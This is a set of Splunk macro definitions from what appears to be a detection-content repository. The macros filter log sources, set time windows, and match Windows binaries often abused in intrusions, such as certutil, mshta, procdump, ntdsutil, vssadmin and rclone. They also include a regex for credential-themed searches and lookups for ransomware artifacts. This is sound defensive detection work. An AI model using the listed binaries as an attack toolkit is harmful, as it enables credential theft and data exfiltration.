2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: moveit_sftp_logs
--------------------------------------------------------------------------------
/macros/ms365_defender_incident_alerts.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=ms365:defender:incident:alerts
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: ms365_defender_incident_alerts
5 |
--------------------------------------------------------------------------------
/macros/ms_defender.yml:
--------------------------------------------------------------------------------
1 | definition: (source="WinEventLog:Microsoft-Windows-Windows Defender/Operational" OR source="XmlWinEventLog:Microsoft-Windows-Windows Defender/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: ms_defender
5 |
--------------------------------------------------------------------------------
/macros/ms_defender_atp_alerts.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=ms:defender:atp:alerts
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: ms_defender_atp_alerts
--------------------------------------------------------------------------------
/macros/msexchange_management.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=MSExchange:management
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: msexchange_management
--------------------------------------------------------------------------------
/macros/netbackup.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="netbackup_logs"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: netbackup
5 |
--------------------------------------------------------------------------------
/macros/network_acl_events.yml:
--------------------------------------------------------------------------------
1 | definition: (eventName = CreateNetworkAcl OR eventName = CreateNetworkAclEntry OR
2 | eventName = DeleteNetworkAcl OR eventName = DeleteNetworkAclEntry OR eventName =
3 | ReplaceNetworkAclEntry OR eventName = ReplaceNetworkAclAssociation)
4 | description: This is a list of AWS event names that are associated with Network ACLs
5 | name: network_acl_events
6 |
--------------------------------------------------------------------------------
/macros/nginx_access_logs.yml:
--------------------------------------------------------------------------------
1 | definition: (sourcetype="nginx:plus:kv" OR sourcetype="nginx:plus:access")
2 | description: This is the base macro for Nginx sourcetypes
3 | name: nginx_access_logs
4 |
--------------------------------------------------------------------------------
/macros/normalized_service_binary_field.yml:
--------------------------------------------------------------------------------
1 | definition: 'EventCode=7036 | spath input=EventData_Xml path="Binary" output=binary_data | eval trimmed_hexbytes = mvjoin(split(trim(binary_data, "0"), "00"), "") | eval normalized_service_name = if(match(trimmed_hexbytes,"^[0-9A-F]+$"),urldecode(replace(trimmed_hexbytes,"([0-9A-F]{2})","%\1")),trimmed_hexbytes)'
2 | description: customer specific splunk configurations to normalized Windows Event Log System 7036 to recover actual services execution.
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: normalized_service_binary_field
--------------------------------------------------------------------------------
/macros/ntlm_audit.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=XmlWinEventLog:Microsoft-Windows-NTLM/Operational OR source=XmlWinEventLog:Microsoft-Windows-NTLM/Operational
2 | description: Customer specific splunk configurations(eg- index, source, sourcetype). Replace the macro definition with configurations for your Splunk Environment.
3 | name: ntlm_audit
--------------------------------------------------------------------------------
/macros/o365_graph.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=o365:graph:api
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: o365_graph
5 |
--------------------------------------------------------------------------------
/macros/o365_management_activity.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=o365:management:activity
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: o365_management_activity
5 |
--------------------------------------------------------------------------------
/macros/o365_messagetrace.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype IN ("ms:o365:reporting:messagetrace","o365:reporting:messagetrace")
2 | description: Customer specific splunk configurations(eg- index, source, sourcetype). Replace the macro definition with configurations for your Splunk Environmnent.
3 | name: o365_messagetrace
4 |
--------------------------------------------------------------------------------
/macros/o365_suspect_search_terms_regex.yml:
--------------------------------------------------------------------------------
1 | definition: "\"(?i)password|credential|login|passwd|shadow|active directory|account|username|network|computer|access|MFA|bank|deposit|payroll|EFT|Electonic Funds|routing\""
2 | description: A regex used with match statements preloaded with generic suspicious terms or phrases. Is used to detect malicious actor or insider threat searches, replace/modify these terms to suit your organization.
3 | name: o365_suspect_search_terms_regex
4 |
--------------------------------------------------------------------------------
/macros/okta.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype=okta_log OR sourcetype = "OktaIM2:log"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: okta
5 |
--------------------------------------------------------------------------------
/macros/oldsummaries_config.yml:
--------------------------------------------------------------------------------
1 | definition: "true"
2 | description: Used inside security_content_summariesonly to adjust the allow_old_summaries configuration
3 | name: oldsummaries_config
4 |
--------------------------------------------------------------------------------
/macros/osquery_macro.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=osquery:results
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: osquery_macro
--------------------------------------------------------------------------------
/macros/osquery_process.yml:
--------------------------------------------------------------------------------
1 | definition: eventtype="osquery-process"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: osquery_process
--------------------------------------------------------------------------------
/macros/papercutng.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype="papercutng"
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: papercutng
5 |
--------------------------------------------------------------------------------
/macros/pingid.yml:
--------------------------------------------------------------------------------
1 | definition: source=PINGID
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: pingid
--------------------------------------------------------------------------------
/macros/potential_password_in_username_false_positive_reduction.yml:
--------------------------------------------------------------------------------
1 | definition: search *
2 | description: Add customer specific known false positives to the map command used in detection - Potential password in username
3 | name: potential_password_in_username_false_positive_reduction
--------------------------------------------------------------------------------
/macros/powershell.yml:
--------------------------------------------------------------------------------
1 | definition: (source=WinEventLog:Microsoft-Windows-PowerShell/Operational OR source="XmlWinEventLog:Microsoft-Windows-PowerShell/Operational" OR source=WinEventLog:PowerShellCore/Operational OR source="XmlWinEventLog:PowerShellCore/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: powershell
5 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_api_calls_per_user_role_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of cloud api calls per user role
2 | definition: '"-90d@d"'
3 | name: previously_seen_cloud_api_calls_per_user_role_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_compute_creations_by_user_search_window_begin_offset.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far into the past the window should be to determine if the user is new or not
2 | definition: '"-70m@m"'
3 | name: previously_seen_cloud_compute_creations_by_user_search_window_begin_offset
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_compute_image_search_window_begin_offset.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far into the past the window should be to determine if the image is new or not
2 | definition: '"-70m@m"'
3 | name: previously_seen_cloud_compute_image_search_window_begin_offset
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_compute_images_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of cloud instance images
2 | definition: '"-90d@d"'
3 | name: previously_seen_cloud_compute_images_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_compute_instance_type_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of cloud instance types
2 | definition: '"-90d@d"'
3 | name: previously_seen_cloud_compute_instance_type_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_compute_instance_types_search_window_begin_offset.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far into the past the window
2 | should be to determine if the instance type is new or not
3 | definition: '"-70m@m"'
4 | name: previously_seen_cloud_compute_instance_types_search_window_begin_offset
5 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far into the past the window should be to determine if the user is new or not
2 | definition: '"-70m@m"'
3 | name: previously_seen_cloud_instance_modifications_by_user_search_window_begin_offset
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_provisioning_activity_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of cloud provisioning locations
2 | definition: '"-90d@d"'
3 | name: previously_seen_cloud_provisioning_activity_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_region_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of cloud regions
2 | definition: '"-90d@d"'
3 | name: previously_seen_cloud_region_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_cloud_regions_search_window_begin_offset.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far into the past the window should be to determine if the region is new or not
2 | definition: '"-70m@m"'
3 | name: previously_seen_cloud_regions_search_window_begin_offset
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_windows_services_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of Windows services
2 | definition: '"-90d@d"'
3 | name: previously_seen_windows_services_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_windows_services_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far back you should be checking for new Windows services
2 | definition: '"-70m@m"'
3 | name: previously_seen_windows_services_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_zoom_child_processes_forget_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how long to keep track of zoom child processes
2 | definition: '"-90d@d"'
3 | name: previously_seen_zoom_child_processes_forget_window
4 |
--------------------------------------------------------------------------------
/macros/previously_seen_zoom_child_processes_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far back you should be checking for new zoom child processes
2 | definition: '"-70m@m"'
3 | name: previously_seen_zoom_child_processes_window
4 |
--------------------------------------------------------------------------------
/macros/previously_unseen_cloud_provisioning_activity_window.yml:
--------------------------------------------------------------------------------
1 | description: Use this macro to determine how far back you should be checking for new provisioning activities
2 | definition: '"-70m@m"'
3 | name: previously_unseen_cloud_provisioning_activity_window
4 |
--------------------------------------------------------------------------------
/macros/printservice.yml:
--------------------------------------------------------------------------------
1 | definition: (source="Wineventlog:microsoft-windows-printservice/operational" OR source="XmlWineventlog:microsoft-windows-printservice/operational" OR source="WinEventLog:Microsoft-Windows-PrintService/Admin" OR source="XmlWinEventLog:Microsoft-Windows-PrintService/Admin")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: printservice
5 |
--------------------------------------------------------------------------------
/macros/process_auditpol.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name="auditpol.exe" OR Processes.original_file_name="AUDITPOL.EXE")
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_auditpol
4 |
--------------------------------------------------------------------------------
/macros/process_bitsadmin.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=bitsadmin.exe OR Processes.original_file_name=bitsadmin.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_bitsadmin
--------------------------------------------------------------------------------
/macros/process_certutil.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=certutil.exe OR Processes.original_file_name=CertUtil.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_certutil
--------------------------------------------------------------------------------
/macros/process_cmd.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=cmd.exe OR Processes.original_file_name=Cmd.Exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_cmd
--------------------------------------------------------------------------------
/macros/process_copy.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=copy.exe OR Processes.original_file_name=copy.exe OR Processes.process_name=xcopy.exe OR Processes.original_file_name=xcopy.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_copy
--------------------------------------------------------------------------------
/macros/process_csc.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=csc.exe OR Processes.original_file_name=csc.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_csc
--------------------------------------------------------------------------------
/macros/process_cscript.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=cscript.exe OR Processes.original_file_name=cscript.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_cscript
4 |
--------------------------------------------------------------------------------
/macros/process_curl.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=curl.exe OR Processes.original_file_name=Curl.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_curl
--------------------------------------------------------------------------------
/macros/process_diskshadow.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=diskshadow.exe OR Processes.original_file_name=diskshadow.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_diskshadow
--------------------------------------------------------------------------------
/macros/process_dllhost.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=dllhost.exe OR Processes.original_file_name=dllhost.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_dllhost
4 |
--------------------------------------------------------------------------------
/macros/process_dsquery.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=dsquery.exe OR Processes.original_file_name=dsquery.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_dsquery
4 |
--------------------------------------------------------------------------------
/macros/process_dxdiag.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=dxdiag.exe OR Processes.original_file_name=dxdiag.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_dxdiag
--------------------------------------------------------------------------------
/macros/process_esentutl.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=esentutl.exe OR Processes.original_file_name=esentutl.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_esentutl
4 |
--------------------------------------------------------------------------------
/macros/process_fodhelper.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=fodhelper.exe OR Processes.original_file_name=FodHelper.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_fodhelper
4 |
--------------------------------------------------------------------------------
/macros/process_gpupdate.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=gpupdate.exe OR Processes.original_file_name=GPUpdate.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_gpupdate
4 |
--------------------------------------------------------------------------------
/macros/process_hh.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=hh.exe OR Processes.original_file_name=HH.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_hh
--------------------------------------------------------------------------------
/macros/process_installutil.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=installutil.exe OR Processes.original_file_name=InstallUtil.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_installutil
4 |
--------------------------------------------------------------------------------
/macros/process_microsoftworkflowcompiler.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=microsoft.workflow.compiler.exe OR Processes.original_file_name=Microsoft.Workflow.Compiler.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_microsoftworkflowcompiler
4 |
--------------------------------------------------------------------------------
/macros/process_msbuild.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=msbuild.exe OR Processes.original_file_name=MSBuild.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_msbuild
4 |
--------------------------------------------------------------------------------
/macros/process_mshta.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=mshta.exe OR Processes.original_file_name=MSHTA.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_mshta
--------------------------------------------------------------------------------
/macros/process_msiexec.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=msiexec.exe OR Processes.original_file_name=msiexec.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_msiexec
--------------------------------------------------------------------------------
/macros/process_net.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name="net1.exe" OR Processes.original_file_name="net1.exe")
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_net
--------------------------------------------------------------------------------
/macros/process_netsh.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=netsh.exe OR Processes.original_file_name=netsh.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_netsh
--------------------------------------------------------------------------------
/macros/process_nltest.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=nltest.exe OR Processes.original_file_name=nltestrk.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_nltest
4 |
--------------------------------------------------------------------------------
/macros/process_ntdsutil.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=ntdsutil.exe OR Processes.original_file_name=ntdsutil.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_ntdsutil
4 |
--------------------------------------------------------------------------------
/macros/process_office_products.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name IN ("EQNEDT32.exe", "excel.exe", "Graph.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "onenoteim.exe", "onenotem.exe", "outlook.exe", "powerpnt.exe", "visio.exe", "winproj.exe", "winword.exe", "wordpad.exe", "wordview.exe") OR Processes.original_file_name IN ("EQNEDT32.EXE", "Excel.exe", "Graph.exe", "MSACCESS.EXE", "MSPUB.EXE", "OneNote.exe", "OneNoteIm.exe", "OneNoteM.exe", "OUTLOOK.EXE", "POWERPNT.EXE", "VISIO.EXE", "WinProj.exe", "WinWord.exe"))
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_office_products
4 |
--------------------------------------------------------------------------------
/macros/process_office_products_parent.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.parent_process_name IN ("EQNEDT32.exe", "excel.exe", "Graph.exe", "msaccess.exe", "mspub.exe", "onenote.exe", "onenoteim.exe", "onenotem.exe", "outlook.exe", "powerpnt.exe", "visio.exe", "winproj.exe", "winword.exe"))
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_office_products_parent
--------------------------------------------------------------------------------
/macros/process_ping.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=ping.exe OR Processes.original_file_name=ping.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_ping
--------------------------------------------------------------------------------
/macros/process_powershell.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=pwsh.exe OR Processes.process_name=powershell.exe OR Processes.process_name=powershell_ise.exe OR Processes.original_file_name=pwsh.dll OR Processes.original_file_name=PowerShell.EXE OR Processes.original_file_name=powershell_ise.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_powershell
--------------------------------------------------------------------------------
/macros/process_procdump.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=procdump.exe OR Processes.process_name=procdump64.exe OR Processes.original_file_name=procdump)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_procdump
--------------------------------------------------------------------------------
/macros/process_psexec.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=psexec.exe OR Processes.process_name=psexec64.exe OR Processes.original_file_name=psexec.c)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_psexec
--------------------------------------------------------------------------------
/macros/process_rclone.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.original_file_name=rclone.exe OR Processes.process_name=rclone.exe)
2 | description: Matches the process with its original file name.
3 | name: process_rclone
--------------------------------------------------------------------------------
/macros/process_reg.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=reg.exe OR Processes.original_file_name=reg.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_reg
--------------------------------------------------------------------------------
/macros/process_regasm.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=regasm.exe OR Processes.original_file_name=RegAsm.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_regasm
--------------------------------------------------------------------------------
/macros/process_regedit.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=regedit.exe OR Processes.original_file_name=REGEDIT.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_regedit
4 |
--------------------------------------------------------------------------------
/macros/process_regsvcs.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=regsvcs.exe OR Processes.original_file_name=RegSvcs.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_regsvcs
4 |
--------------------------------------------------------------------------------
/macros/process_regsvr32.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=regsvr32.exe OR Processes.original_file_name=REGSVR32.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_regsvr32
--------------------------------------------------------------------------------
/macros/process_route.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=route.exe OR Processes.original_file_name=route.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_route
--------------------------------------------------------------------------------
/macros/process_runas.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=runas.exe OR Processes.original_file_name=runas.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_runas
--------------------------------------------------------------------------------
/macros/process_rundll32.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=rundll32.exe OR Processes.original_file_name=RUNDLL32.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_rundll32
--------------------------------------------------------------------------------
/macros/process_sc.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name="sc.exe" OR Processes.original_file_name="sc.exe")
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_sc
--------------------------------------------------------------------------------
/macros/process_schtasks.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=schtasks.exe OR Processes.original_file_name=schtasks.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_schtasks
4 |
--------------------------------------------------------------------------------
/macros/process_sdelete.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=sdelete.exe OR Processes.original_file_name=sdelete.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_sdelete
--------------------------------------------------------------------------------
/macros/process_setspn.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=setspn.exe OR Processes.original_file_name=setspn.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_setspn
4 |
--------------------------------------------------------------------------------
/macros/process_sqlcmd.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=sqlcmd.exe OR Processes.original_file_name=sqlcmd.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_sqlcmd
--------------------------------------------------------------------------------
/macros/process_verclsid.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=verclsid.exe OR Processes.original_file_name=verclsid.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_verclsid
--------------------------------------------------------------------------------
/macros/process_vssadmin.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=vssadmin.exe OR Processes.original_file_name=VSSADMIN.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_vssadmin
4 |
--------------------------------------------------------------------------------
/macros/process_wbadmin.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=wbadmin.exe OR Processes.original_file_name=WBADMIN.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_wbadmin
4 |
--------------------------------------------------------------------------------
/macros/process_wermgr.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=wermgr.exe OR Processes.original_file_name=wermgr.EXE)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_wermgr
--------------------------------------------------------------------------------
/macros/process_wmic.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=wmic.exe OR Processes.original_file_name=wmic.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_wmic
--------------------------------------------------------------------------------
/macros/process_wscript.yml:
--------------------------------------------------------------------------------
1 | definition: (Processes.process_name=wscript.exe OR Processes.original_file_name=wscript.exe)
2 | description: Matches the process with its original file name, data for this macro came from https://strontic.github.io/
3 | name: process_wscript
4 |
--------------------------------------------------------------------------------
/macros/prohibited_apps_launching_cmd_macro.yml:
--------------------------------------------------------------------------------
1 | definition: '| inputlookup prohibited_apps_launching_cmd | rename prohibited_applications
2 | as parent_process_name | eval parent_process_name="*" . parent_process_name | table
3 | parent_process_name'
4 | description: This macro outputs a list of process that should not be the parent process
5 | of cmd.exe
6 | name: prohibited_apps_launching_cmd_macro
7 |
--------------------------------------------------------------------------------
/macros/prohibited_softwares.yml:
--------------------------------------------------------------------------------
1 | definition: search *
2 | description: This macro is deprecated. Update this macro to look for prohibited softwares in your environment
3 | name: prohibited_softwares
4 |
--------------------------------------------------------------------------------
/macros/ransomware_extensions.yml:
--------------------------------------------------------------------------------
1 | definition: lookup update=true ransomware_extensions_lookup Extensions AS file_extension OUTPUT Extensions Name | search Name !=False
2 | description: This macro limits the output to files that have extensions associated
3 | with ransomware
4 | name: ransomware_extensions
5 |
--------------------------------------------------------------------------------
/macros/ransomware_notes.yml:
--------------------------------------------------------------------------------
1 | definition: lookup ransomware_notes_lookup ransomware_notes as file_name OUTPUT status
2 | as "Known Ransomware Notes" | search "Known Ransomware Notes"=True
3 | description: This macro limits the output to files that have been identified as a
4 | ransomware note
5 | name: ransomware_notes
6 |
--------------------------------------------------------------------------------
/macros/remoteconnectionmanager.yml:
--------------------------------------------------------------------------------
1 | definition: (source="WinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" OR source="XmlWinEventLog:Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational")
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: remoteconnectionmanager
--------------------------------------------------------------------------------
/macros/remove_valid_domains.yml:
--------------------------------------------------------------------------------
1 | definition: eval domain=trim(domain,"*") | search NOT[| inputlookup domains] NOT[
2 | |inputlookup cim_corporate_email_domain_lookup] NOT[inputlookup cim_corporate_web_domain_lookup]
3 | | eval domain="*"+domain+"*"
4 | description: This macro removes valid domains from the output
5 | name: remove_valid_domains
6 |
--------------------------------------------------------------------------------
/macros/risk_index.yml:
--------------------------------------------------------------------------------
1 | definition: index=risk
2 | description: customer specific splunk configurations(eg- index, source, sourcetype).
3 | Replace the macro definition with configurations for your Splunk Environment.
4 | name: risk_index
5 |
--------------------------------------------------------------------------------
/macros/s3_accesslogs.yml:
--------------------------------------------------------------------------------
1 | definition: sourcetype=aws:s3:accesslogs
2 | description: customer specific splunk configurations(eg- index, source, sourcetype) for AWS cloudwatch vpc logs. Replace the macro definition with configurations for your Splunk Environment.
3 | name: s3_accesslogs
4 |
--------------------------------------------------------------------------------
/macros/security_content_ctime.yml:
--------------------------------------------------------------------------------
1 | arguments:
2 | - field
3 | definition: 'convert timeformat="%Y-%m-%dT%H:%M:%S" ctime($field$)'
4 | description: convert epoch time to string
5 | name: security_content_ctime
6 |
--------------------------------------------------------------------------------
/macros/security_content_summariesonly.yml:
--------------------------------------------------------------------------------
1 | definition: summariesonly=`summariesonly_config` allow_old_summaries=`oldsummaries_config` fillnull_value=`fillnull_config`
2 | description: search data model's summaries only
3 | name: security_content_summariesonly
4 |
--------------------------------------------------------------------------------
/macros/security_group_api_calls.yml:
--------------------------------------------------------------------------------
1 | definition: (eventName=AuthorizeSecurityGroupIngress OR eventName=CreateSecurityGroup
2 | OR eventName=DeleteSecurityGroup OR eventName=DescribeClusterSecurityGroups OR eventName=DescribeDBSecurityGroups
3 | OR eventName=DescribeSecurityGroupReferences OR eventName=DescribeSecurityGroups
4 | OR eventName=DescribeStaleSecurityGroups OR eventName=RevokeSecurityGroupIngress
5 | OR eventName=UpdateSecurityGroupRuleDescriptionsIngress)
6 | description: This macro is a list of AWS event names associated with security groups
7 | name: security_group_api_calls
8 |
